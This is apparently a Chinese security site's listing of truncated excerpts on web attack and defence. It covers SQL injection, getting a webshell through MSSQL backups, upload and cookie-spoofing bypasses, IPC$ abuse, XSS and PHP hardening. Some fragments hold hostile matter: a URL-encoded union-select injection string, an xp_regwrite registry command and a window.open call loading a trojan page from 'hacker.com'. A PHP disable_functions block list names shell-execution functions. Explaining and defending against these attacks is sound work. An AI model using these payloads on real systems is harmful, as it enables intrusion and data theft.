脚本攻防

以下本文总结来自黑防去年第9期杂志上的内容… 先说一个注入吧:http://www.xx.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b% 26user,0x3b%26p...

网站路径也搞到了，本想使用差异备份，在数据库日志中插入一句话，然后备份到网站目录下拿shell的，估计是用户没有备份数据库的权限，但使用MSSQL2000的备份方法根本行不通，后来才想到MSSQL2005的备份和MSSQL2000有点不同。 后来在网上...

今天无聊来看看他们的站，打开网站 asp 的企业站 ，点了几个链接看了下，看不出来什么程序 于是扫扫目录 扫出来个 upload_photo.asp 这个文件一般使用的是无惧无组件上传 ，存在双文件上传的漏洞 ，尝试 cookies 欺骗绕过登录检测 ...

以下方法都以需要SA权限为前提。 1, 沙盒模式的变通. 原始方法: 第一句开启沙盘模式：exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\\Micros...

IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。简单点说就是通过你的系统帐号和密码登陆你的系统的一个通道！而 IPC$ 并不算是一个漏洞，但因一般电脑用户设置系统的密码为空，这就成为一个可给利用的漏洞...

这种方法使用的关键代码如下： window.open("http://www.hacker.com/木马.html","","toolbar=no,location=no,directories=no,...

在鼠标点击的一刹那，流量在用户系统中流过层层节点，在路由的指引下奔向远程服务器。这段路程中短兵相接的战斗往往是最激烈的，在所有流量可能路过的节点往往都埋伏着劫持者，流量劫持的手段也层出不穷，从主页配置篡改、hosts劫持、进程Hook、启动劫持、LSP...

这类攻击有一个最大的特性，就是上传流量霎时增大，通常流量高达数十以至近百M，将整台效 劳器，以至将整台机柜的宽带堵住，使网站无法运转，而这样的攻击，我们无法从远程处理，一但那个phpshell运转，你的宽带将被全部占用，远程都无法 衔接。 　　被攻击后...

XSS（cross-site scripting跨域脚本攻击）攻击是最常见的Web攻击，其重点是“跨域”和“客户端执行”。有人将XSS攻击分为三种，分别是： 1. Reflected XSS（基于反射的X...

在最近两年中，安全专家应该对网络应用层的攻击更加重视。因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制，如果你的网络应用程序开发者没有遵循 安全代码进行开发，攻击者将通过80端口进入你的系统。广泛被使用的两个主要攻击技术是SQL注入[ref...

玩也玩够了，有点鸡肋，会提示此模板没安装等情况..有人发出来了 那老衲也发吧 谷歌批量还需改进 一会儿会补上！ 原文： http://www.wooyun.org/bug.php?action=view&id=2984 测试如下： http:...

禁用不安全的PHP函数,有些php函数是不够安全的,我们必须要加强安全配置,如果做虚拟主机,建议禁止php函数列表如下: 复制代码 代码如下: disable_functions = system,exec,shell_exec,passthru,pr...